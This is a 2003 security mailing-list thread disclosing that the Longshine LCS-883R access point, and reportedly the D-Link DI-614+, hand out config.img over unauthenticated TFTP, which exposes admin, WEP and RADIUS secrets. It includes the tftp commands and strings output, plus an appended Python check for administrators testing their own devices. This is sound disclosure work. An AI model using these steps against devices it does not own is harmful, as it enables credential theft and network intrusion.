Longshine WLAN Access-Point LCS-883R VU#310201
Jan 06 2003 10:52AM
Lukas Grunwald (lukas dnx de)
Re: Longshine WLAN Access-Point LCS-883R VU#310201
Jan 06 2003 06:57PM
heydowns borg com
This vulnerability is also an issue on the popular DLink DI-614+ (which I
think is based upon the Longshine product). I was able to grab config.img
and also extract the "admin" password from it. This was confirmed with
firmware version 2.03 dated 9/10/2002.
On the DLink product, you can only perform this from the "LAN-side" of the
device in the default configuration.
DLink has version 2.10 available, dated 11/25/2002, but I have not tried
On Mon, 6 Jan 2003, Lukas Grunwald wrote:
> Hardware: Longshine LCS-883R-AC-B External WLAN Access Point 22 Mbps
> Software: ThreadX ARM7/Green Hills Version G3.0f.3.0c from Express Logic Inc.
> Description: Get Superuser Privileges and view the device's password and other passwords
> Versions affected: tested with 03.01.0b and 03.01.0h
> Vendor contacted: e-mailed Longshine at Sun Dec 29
> Details: You are able to connect via tftp to the access-point and you can download the configuration
> without authentication.
> In this configuration the username of the superuser and the corresponding password are stored.
> The WEP Secret for the encryption and the password from your radius server are also readable.
> This "attack" works via WLAN (!!!) and Ethernet.
> tftp> connect 192.168.108.48
> tftp> get config.img
> Received 780 bytes in 1.0 seconds
> tftp> quit
> [~]/-\>strings config.img
> DNXLABAP01 <- name of the AP
> root <- name of the superuser
> XXXXXX123 <- password from superuser
> DNXLABLAN <- ssid
> secu9 <- secret for WEP
> 7890abcdef <-
> You are also able to get the following files:
> Solution: after contact with the vendor he claims that a new firmware-upgrade
> fixes this problem, but the latest available firmware on his web-page
> doesn't fix it anyway.
> LONGSHINE Technologie (Europe) GmbH
> An der Strusbek 9
> D-22926 Ahrensburg
> Tel: ++ 49 ( 0 ) 4102 / 4922- 0
> Fax: ++ 49 ( 0 ) 4102 / 40109
> support (at) longshine (dot) de
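Added example, not part of either post above: a check an administrator can run against their own access point or router after a firmware upgrade, to see whether an unauthenticated TFTP read of config.img is still answered. It assumes standard TFTP (RFC 1350) on UDP port 69; the function names are hypothetical and the two sample replies are constructed, not captured from a device.

```python
import socket
import struct

# TFTP opcodes from RFC 1350
RRQ, DATA, ERROR = 1, 3, 5

def build_rrq(filename: str, mode: str = "octet") -> bytes:
    """Read request: 2-byte opcode, filename, NUL, transfer mode, NUL."""
    return (struct.pack("!H", RRQ) + filename.encode("ascii") + b"\0"
            + mode.encode("ascii") + b"\0")

def classify_reply(packet: bytes) -> str:
    """Interpret the first packet a TFTP server sends back to a read request."""
    if len(packet) < 4:
        return "malformed"
    opcode, arg = struct.unpack("!HH", packet[:4])
    if opcode == DATA and arg == 1:
        # Block 1 of the file arrived although no credentials were supplied.
        return "exposed"
    if opcode == ERROR:
        # arg is the error code, followed by a NUL-terminated message.
        msg = packet[4:].split(b"\0", 1)[0].decode("ascii", "replace")
        return f"refused ({arg}: {msg})"
    return "unexpected"

def check_device(host: str, filename: str = "config.img",
                 timeout: float = 3.0) -> str:
    """Send one read request to a device you administer and classify the answer."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        try:
            s.sendto(build_rrq(filename), (host, 69))
            packet, _ = s.recvfrom(4 + 512)  # header plus one full data block
        except OSError:  # timeout or unreachable
            return "no answer (TFTP closed, filtered or unreachable)"
    return classify_reply(packet)

# Constructed sample replies for offline use (not from a real device).
SAMPLE_DATA = struct.pack("!HH", DATA, 1) + b"<config bytes>"
SAMPLE_ERROR = struct.pack("!HH", ERROR, 2) + b"Access violation\0"

if __name__ == "__main__":
    print(classify_reply(SAMPLE_DATA))   # reply of a device that hands out the file
    print(classify_reply(SAMPLE_ERROR))  # reply of a device that refuses the read
```

Run check_device() from both the wired and the wireless side, since the original report says the download works over WLAN as well as Ethernet.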
Copyright 2010, SecurityFocus